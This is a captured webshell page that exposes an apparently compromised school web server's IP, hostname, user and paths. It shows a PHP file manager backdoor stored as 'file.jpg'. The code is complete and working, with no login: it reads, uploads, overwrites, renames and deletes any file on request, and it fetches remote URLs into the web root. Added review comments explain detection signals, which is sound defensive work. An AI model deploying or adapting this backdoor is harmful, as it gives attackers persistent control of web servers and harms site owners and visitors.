403Webshell
Server IP : 27.254.66.5  /  Your IP : 216.73.217.39
Web Server : Apache/2
System : Linux cs82.hostneverdie.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
User : technic2 ( 1951)
PHP Version : 7.4.30
Disable Function : apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd,exec, fp, fput, highlight_file, ini_alter, ini_restore, inject_code, passthru,phpAds_remoteInfo, phpAds_XmlRpc,phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid,posix_setuid, posix_setuid, posix_uname,proc_open,proc_close, proc_get_status, proc_nice, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode, show_source,sleep,pcntl_exec,virtual,suexec,dbmopen,dl,symlink,disk_free_space,diskfreespace,leak
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/technic2/domains/technicrayong.ac.th/public_html/teacher/


Current File : /home/technic2/domains/technicrayong.ac.th/public_html/teacher/file.jpg
� trio@ngefly �!
<?php
// filemanager.php
// NOTE(review): the page header above shows this file stored as file.jpg, while this comment
// names it filemanager.php. PHP source under an image extension inside the site's public_html
// tree is a useful file-integrity / content-type-mismatch detection signal.
// Report every error level and print errors into the HTTP response.
error_reporting(E_ALL);
ini_set('display_errors', 1);

// ------------ Util & init -------------
/**
 * Resolve a path with realpath(), falling back to a separator-normalised copy of the input.
 *
 * Despite the name, nothing here confines the result to a base directory or rejects "..":
 * the function only canonicalises. In this file the argument comes from $_GET/$_POST values
 * (or getcwd() as a default), so every handler that relies on it works on request-chosen paths.
 *
 * @param string $p Path to resolve.
 * @return string Canonical path, or the normalised input when realpath() fails (never false).
 */
function safeRealpath($p) {
    $r = realpath($p);
    if ($r === false) {
        // Fallback: normalise both separator styles to the platform one and strip trailing separators.
        $r = rtrim(str_replace(['/', '\\'], DIRECTORY_SEPARATOR, $p), DIRECTORY_SEPARATOR);
    }
    return $r;
}

// Determine the current directory: the 'dir' query parameter, or getcwd() by default.
// NOTE(review): the directory is chosen by the request and is not compared against any base
// path, so the listing can be pointed at any directory the PHP user can read.
$requested = isset($_GET['dir']) ? $_GET['dir'] : getcwd();
$currentDir = safeRealpath($requested);
// safeRealpath() replaces a failed realpath() with a string, so this guard appears unreachable.
if ($currentDir === false) $currentDir = getcwd();

// ---------------- LOCAL DOWNLOAD ----------------
// Sends the file named in the 'download' query parameter back to the client as an attachment.
// NOTE(review): the path is taken from the request and only tested with is_file()/is_readable();
// no login or base-directory check is visible in this listing, so this amounts to reading any
// file the PHP user can read. In access logs it appears as GET requests whose download=
// parameter carries a filesystem path.
if (isset($_GET['download'])) {
    $downloadPath = safeRealpath($_GET['download']);
    if ($downloadPath && is_file($downloadPath) && is_readable($downloadPath)) {
        // Generic binary download, named after the file's basename.
        header('Content-Description: File Transfer');
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="' . basename($downloadPath) . '"');
        header('Content-Length: ' . filesize($downloadPath));
        readfile($downloadPath);
        exit;
    } else {
        // Runtime message (Indonesian): "File not found or cannot be read."
        echo "File tidak ditemukan atau tidak dapat dibaca.";
        exit;
    }
}

// ---------------- Actions ----------------
/**
 * Redirect the browser back to the listing of the given directory and stop the script.
 *
 * @param string $dir Directory to show next; URL-encoded into the 'dir' query parameter.
 * @return void Does not return: exit is called right after the Location header is set.
 */
function redirectTo($dir) {
    header("Location: ?dir=" . urlencode($dir));
    exit;
}

// ---------------- LOCAL UPLOAD ----------------
// Handles a multipart POST with an 'upload' file part and writes it into the directory named
// by the posted current_dir (getcwd() when that field is missing or is not a directory).
// NOTE(review): the destination directory is request-controlled and the name filter below
// keeps dots, so no file type or extension is excluded; no login check is visible in this
// listing. The artefact to look for is a new mode-0644 file under the web root right after a
// multipart POST to this script.
$uploadMessage = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['upload'])) {
    $postDir = isset($_POST['current_dir']) ? safeRealpath($_POST['current_dir']) : getcwd();
    // If current_dir points at a file, use the directory that contains it.
    if ($postDir && is_file($postDir)) $postDir = dirname($postDir);
    $targetDir = ($postDir && is_dir($postDir)) ? $postDir : getcwd();

    $f = $_FILES['upload'];
    if ($f['error'] !== UPLOAD_ERR_OK) {
        $uploadMessage = "Upload error (code {$f['error']}).";
    } elseif (!is_uploaded_file($f['tmp_name'])) {
        // Runtime message: "Invalid file upload (not from HTTP POST)."
        $uploadMessage = "File upload tidak valid (bukan dari HTTP POST).";
    } elseif (!is_writable($targetDir)) {
        // Runtime message: "Destination folder is not writable: ..."
        $uploadMessage = "Folder tujuan tidak writable: " . htmlspecialchars($targetDir);
    } else {
        // Keep only the basename and replace anything outside [A-Za-z0-9._-] with '_'.
        $orig = basename($f['name']);
        $safe = preg_replace('/[^A-Za-z0-9._-]/', '_', $orig);
        if ($safe === '' || $safe === '.' || $safe === '..') {
            // Runtime message: "Invalid file name."
            $uploadMessage = "Nama file tidak valid.";
        } else {
            $targetPath = $targetDir . DIRECTORY_SEPARATOR . $safe;
            // Copy via streams rather than move_uploaded_file(); 'wb' truncates an existing
            // file of the same name. Open failures are silenced with @ and handled below.
            $in  = @fopen($f['tmp_name'], 'rb');
            $out = @fopen($targetPath, 'wb');
            if ($in && $out) {
                $bytes = stream_copy_to_stream($in, $out);
                fclose($in);
                fclose($out);
                if ($bytes !== false) {
                    @chmod($targetPath, 0644);
                    // Success banner is pre-built HTML (name, location, copied size, download
                    // link); the template later echoes it without further escaping.
                    $uploadMessage = "✅ File dibuat & diisi: " . htmlspecialchars($safe)
                        . "<br>Lokasi: " . htmlspecialchars($targetDir)
                        . "<br>Ukuran tersalin: " . number_format($bytes) . " byte"
                        . "<br><a href='?download=" . rawurlencode($targetPath) . "' target='_blank'>⬇️ Download</a>";
                } else {
                    // Copy failed: remove the partial file. Message: "Failed to copy file contents to: ..."
                    @unlink($targetPath);
                    $uploadMessage = "❌ Gagal menyalin isi file ke: " . htmlspecialchars($targetPath);
                }
            } else {
                // Close whichever stream did open. Message: "Cannot open read/write stream. Check folder permissions."
                if ($in) fclose($in);
                if ($out) fclose($out);
                $uploadMessage = "❌ Tidak bisa membuka stream baca/tulis. Periksa permission folder.";
            }
        }
    }
}

// ---------------- DOWNLOAD FROM URL ----------------
// Handles a POST carrying 'download_url': the server itself fetches the URL and stores the body
// in the posted current_dir under the URL path's sanitised basename.
// NOTE(review): only URL syntax is validated (FILTER_VALIDATE_URL); no host or scheme
// allow-list is visible, and current_dir is not checked with is_dir() here. This is the
// remote-staging path of the script: defenders would see an outbound fetch from the PHP
// worker followed by a new file under the web root. Presumably depends on allow_url_fopen
// being enabled — confirm against the host's php.ini.
$downloadMessage = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['download_url'])) {
    $currentDir = isset($_POST['current_dir']) ? safeRealpath($_POST['current_dir']) : getcwd();
    $url = trim($_POST['download_url']);

    if (filter_var($url, FILTER_VALIDATE_URL)) {
        // Derive the local name from the URL path; fall back to a fixed name when nothing usable remains.
        $filename = basename(parse_url($url, PHP_URL_PATH));
        $filename = preg_replace('/[^A-Za-z0-9._-]/', '_', $filename);
        if ($filename === '' || $filename === '.' || $filename === '..') $filename = 'downloaded_file';
        $targetPath = $currentDir . DIRECTORY_SEPARATOR . $filename;

        // Fetch the remote resource with a stream copy; 'wb' truncates an existing file of the same name.
        $in  = @fopen($url, 'rb');
        $out = @fopen($targetPath, 'wb');
        if ($in && $out) {
            $bytes = stream_copy_to_stream($in, $out);
            fclose($in);
            fclose($out);
            if ($bytes !== false) {
                @chmod($targetPath, 0644);
                // Success banner is pre-built HTML; the template echoes it without further escaping.
                $downloadMessage = "✅ File dari URL berhasil didownload: <strong>" . htmlspecialchars($filename) . "</strong>
                                    <br>Lokasi: " . htmlspecialchars($currentDir)
                                    . "<br><a href='?download=" . rawurlencode($targetPath) . "' target='_blank'>⬇️ Download</a>";
            } else {
                // Copy failed: remove the partial file. Message: "Failed to write file from URL."
                @unlink($targetPath);
                $downloadMessage = "❌ Gagal menulis file dari URL.";
            }
        } else {
            // Close whichever stream did open. Message: "Cannot open URL or destination folder."
            if ($in) fclose($in);
            if ($out) fclose($out);
            $downloadMessage = "❌ Tidak bisa membuka URL atau folder tujuan.";
        }
    } else {
        // Runtime message: "Invalid URL."
        $downloadMessage = "❌ URL tidak valid.";
    }
}

// ---------------- DELETE ----------------
// Handles a POST carrying 'delete': removes the named file, or the named directory via rmdir()
// (which only succeeds on empty directories), then redirects back to the listing.
// NOTE(review): the only condition on the path is that it contains a directory separator;
// failures are silenced with @, so nothing is reported to the client or the PHP error log.
// Unexplained file removals correlate with POSTs to this script that carry a 'delete' field.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['delete'])) {
    $currentDir = isset($_POST['current_dir']) ? safeRealpath($_POST['current_dir']) : $currentDir;
    $target = safeRealpath($_POST['delete']);
    if ($target && strpos($target, DIRECTORY_SEPARATOR) !== false) {
        if (is_dir($target)) @rmdir($target); else @unlink($target);
    }
    redirectTo($currentDir);
}

// ---------------- RENAME ----------------
// Handles a POST carrying 'rename_path' and 'new_name': renames the entry in place, i.e. the
// new path is always built inside dirname() of the existing one.
// NOTE(review): the new name is reduced to its basename and filtered to [A-Za-z0-9._-], which
// keeps dots, so the extension can be changed freely; rename() errors are silenced with @.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['rename_path'], $_POST['new_name'])) {
    $currentDir = isset($_POST['current_dir']) ? safeRealpath($_POST['current_dir']) : $currentDir;
    $old = safeRealpath($_POST['rename_path']);
    $newName = basename($_POST['new_name']);
    if ($old && file_exists($old)) {
        $newPath = dirname($old) . DIRECTORY_SEPARATOR . preg_replace('/[^A-Za-z0-9._-]/', '_', $newName);
        @rename($old, $newPath);
    }
    redirectTo($currentDir);
}

// ---------------- EDIT / SAVE ----------------
// Two-step editor. Step 1 (POST with 'edit_path', without 'save_content') prints a form holding
// the file's current content and exits. Step 2 (POST with 'save_content' and 'save_path')
// overwrites that file with the posted text and redirects to the listing.
// NOTE(review): both paths are request-supplied and only checked with is_file() plus
// is_readable()/is_writable(), so any existing file the PHP user can write — including the
// site's own PHP sources — can be replaced. Modification-time changes on application files that
// line up with POSTs carrying 'save_path' are the trace to hunt for.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['edit_path']) && !isset($_POST['save_content'])) {
    $currentDir = isset($_POST['current_dir']) ? safeRealpath($_POST['current_dir']) : $currentDir;
    $editPath = safeRealpath($_POST['edit_path']);
    if ($editPath && is_file($editPath) && is_readable($editPath)) {
        // Content and paths are HTML-escaped before being placed in the form.
        $content = htmlspecialchars(file_get_contents($editPath));
        echo "<h3>Editing: " . htmlspecialchars($editPath) . "</h3>
              <form method='post'>
                <input type='hidden' name='save_path' value='" . htmlspecialchars($editPath) . "'>
                <input type='hidden' name='current_dir' value='" . htmlspecialchars($currentDir) . "'>
                <textarea name='content' rows='20' cols='100'>{$content}</textarea><br>
                <button type='submit' name='save_content'>Simpan</button>
              </form>";
        exit;
    } else {
        redirectTo($currentDir);
    }
}
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['save_content'], $_POST['save_path'])) {
    $savePath = safeRealpath($_POST['save_path']);
    if ($savePath && is_file($savePath) && is_writable($savePath)) {
        // 'content' is read without an isset() check; the posted bytes are written unmodified.
        file_put_contents($savePath, $_POST['content']);
    }
    $currentDir = isset($_POST['current_dir']) ? safeRealpath($_POST['current_dir']) : $currentDir;
    redirectTo($currentDir);
}

// ---------------- CREATE FILE / FOLDER ----------------
// Handles POSTs carrying 'new_file' or 'new_folder': creates an empty file or a directory inside
// the posted current_dir, then redirects back to the listing.
// NOTE(review): current_dir is request-controlled and not checked with is_dir(); names are
// reduced to their basename and filtered to [A-Za-z0-9._-]. Writing '' with
// file_put_contents() also truncates an existing file that has the same name.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['new_file'])) {
    $currentDir = isset($_POST['current_dir']) ? safeRealpath($_POST['current_dir']) : $currentDir;
    $name = basename($_POST['new_file']);
    file_put_contents($currentDir . DIRECTORY_SEPARATOR . preg_replace('/[^A-Za-z0-9._-]/', '_', $name), '');
    redirectTo($currentDir);
}
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['new_folder'])) {
    $currentDir = isset($_POST['current_dir']) ? safeRealpath($_POST['current_dir']) : $currentDir;
    $name = basename($_POST['new_folder']);
    // mkdir() errors (for example an already existing directory) are silenced with @.
    @mkdir($currentDir . DIRECTORY_SEPARATOR . preg_replace('/[^A-Za-z0-9._-]/', '_', $name));
    redirectTo($currentDir);
}

// ---------------- LISTING ----------------
/**
 * Render a directory path as a chain of links, one per path component.
 *
 * Each link points at ?dir=<cumulative path>, so every ancestor directory is one click away.
 *
 * @param string $dir Directory path to render; split on both '/' and '\'.
 * @return string HTML fragment: links joined by " / ", or a single "/" link when the path has no components.
 */
function buildBreadcrumb($dir) {
    $parts = preg_split('#[\\/\\\\]#', $dir, -1, PREG_SPLIT_NO_EMPTY);
    // Both branches of this ternary yield ''; $crumbs and $prefix below are assigned but never read.
    $acc = (DIRECTORY_SEPARATOR === '/') ? '' : '';
    $crumbs = [];
    $prefix = DIRECTORY_SEPARATOR;
    $pathParts = [];
    // On '/'-separated systems an absolute path starts the accumulator at the root.
    if (DIRECTORY_SEPARATOR === '/' && substr($dir,0,1) === '/') $acc = DIRECTORY_SEPARATOR;
    foreach ($parts as $p) {
        // Append the component, adding a separator unless the accumulator is empty or just the root.
        $acc .= ($acc === DIRECTORY_SEPARATOR || $acc === '' ? $p : DIRECTORY_SEPARATOR . $p);
        $pathParts[] = $acc;
    }
    if (empty($pathParts)) return "<a href='?dir=" . urlencode(DIRECTORY_SEPARATOR) . "'>/</a>";
    $out = [];
    foreach ($pathParts as $pp) {
        // Link text is the last component (HTML-escaped); the full path is used if basename() is empty.
        $out[] = "<a href='?dir=" . urlencode($pp) . "'>" . htmlspecialchars(basename($pp) ?: $pp) . "</a>";
    }
    return implode(" / ", $out);
}

/**
 * Echo one HTML table row per entry of a directory, with per-entry action controls.
 *
 * Every row carries POST forms for delete and rename; file rows additionally get a download
 * link and an edit form. The forms post the entry's full path back to this script, which is
 * what the request handlers earlier in the file act on.
 *
 * @param string $dir Directory to list.
 * @return void Output is written directly with echo.
 */
function listFilesAndDirs($dir) {
    // scandir() warnings are silenced; a failure is reported as a single table row instead.
    $items = @scandir($dir);
    if ($items === false) {
        // Runtime message: "Cannot read this directory."
        echo "<tr><td colspan='5'>Tidak dapat membaca direktori ini.</td></tr>";
        return;
    }
    foreach ($items as $item) {
        if ($item === '.') continue;
        if ($item === '..') {
            // Parent entry: a plain navigation link with no action controls.
            $parent = dirname($dir);
            echo "<tr><td>📁</td><td><a href='?dir=" . urlencode($parent) . "'>.. (Parent)</a></td><td>-</td><td>-</td><td>-</td></tr>";
            continue;
        }
        $path = $dir . DIRECTORY_SEPARATOR . $item;
        $type = is_dir($path) ? 'Folder' : 'File';
        $size = is_file($path) ? filesize($path) : '-';
        $time = file_exists($path) ? date("Y-m-d H:i:s", filemtime($path)) : '-';
        // Icon, name (a link for folders), size, mtime, then the delete and rename forms.
        // Names and paths are HTML-escaped before being placed in the markup.
        echo "<tr>
            <td>" . ($type === 'Folder' ? '📁' : '📄') . "</td>
            <td>" . ($type==='Folder'? "<a href='?dir=" . urlencode($path) . "'>" . htmlspecialchars($item) . "</a>" : htmlspecialchars($item)) . "</td>
            <td>" . htmlspecialchars($size) . "</td>
            <td>" . htmlspecialchars($time) . "</td>
            <td>
                <form method='post' style='display:inline'>
                    <input type='hidden' name='delete' value='" . htmlspecialchars($path) . "'>
                    <input type='hidden' name='current_dir' value='" . htmlspecialchars($dir) . "'>
                    <button onclick='return confirm(\"Yakin hapus?\")'>🗑</button>
                </form>
                <form method='post' style='display:inline'>
                    <input type='hidden' name='rename_path' value='" . htmlspecialchars($path) . "'>
                    <input type='hidden' name='current_dir' value='" . htmlspecialchars($dir) . "'>
                    <input type='text' name='new_name' placeholder='Nama baru' required>
                    <button>✏️</button>
                </form>";
        if ($type === 'File') {
            // Files only: download link plus the form that opens the editor.
            echo " <a href='?download=" . urlencode($path) . "'>⬇️ Download</a>
                   <form method='post' style='display:inline'>
                     <input type='hidden' name='edit_path' value='" . htmlspecialchars($path) . "'>
                     <input type='hidden' name='current_dir' value='" . htmlspecialchars($dir) . "'>
                     <button>📝 Edit</button>
                   </form>";
        }
        echo "</td></tr>";
    }
}
?>
<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>File Manager</title>
    <style>
        body { font-family: Arial, sans-serif; padding:16px; background:#f7f7f7; }
        table { width:100%; background:#fff; border-collapse:collapse; }
        th, td { padding:8px; border:1px solid #e1e1e1; }
        form { margin:0; display:inline; }
        input[type="text"], input[type="url"] { padding:4px; }
    </style>
</head>
<body>
    <h2>File Manager</h2>
    <p><strong>Lokasi saat ini:</strong> <?= buildBreadcrumb($currentDir) ?></p>

    <?php /* Status banners: both messages are HTML strings assembled by the POST handlers and are echoed as-is. */ if ($uploadMessage): ?>
        <div style="padding:8px; background:#efe; border:1px solid #cfc; margin-bottom:8px;"><?= $uploadMessage ?></div>
    <?php endif; ?>
    <?php if ($downloadMessage): ?>
        <div style="padding:8px; background:#eef; border:1px solid #ccf; margin-bottom:8px;"><?= $downloadMessage ?></div>
    <?php endif; ?>

    <!-- Upload a local file (multipart POST with fields current_dir and upload) -->
    <form method="post" enctype="multipart/form-data" style="margin-bottom:8px;">
        <input type="hidden" name="current_dir" value="<?= htmlspecialchars($currentDir) ?>">
        <input type="file" name="upload" required>
        <button>⬆ Upload</button>
    </form>

    <!-- Download a file from a URL (POST with fields current_dir and download_url) -->
    <form method="post" style="margin-bottom:8px;">
        <input type="hidden" name="current_dir" value="<?= htmlspecialchars($currentDir) ?>">
        <input type="url" name="download_url" placeholder="Masukkan URL file" required style="width:300px;">
        <button>🌐 Download dari URL</button>
    </form>

    <!-- Create a file / folder (POST with fields current_dir and new_file or new_folder) -->
    <form method="post" style="display:inline; margin-right:8px;">
        <input type="hidden" name="current_dir" value="<?= htmlspecialchars($currentDir) ?>">
        <input type="text" name="new_file" placeholder="Nama file baru">
        <button>📄 Buat File</button>
    </form>
    <form method="post" style="display:inline;">
        <input type="hidden" name="current_dir" value="<?= htmlspecialchars($currentDir) ?>">
        <input type="text" name="new_folder" placeholder="Nama folder baru">
        <button>📁 Buat Folder</button>
    </form>

    <table style="margin-top:12px;">
        <thead><tr><th>Type</th><th>Nama</th><th>Ukuran</th><th>Waktu</th><th>Aksi</th></tr></thead>
        <tbody>
            <?php listFilesAndDirs($currentDir); ?>
        </tbody>
    </table>
</body>
</html>
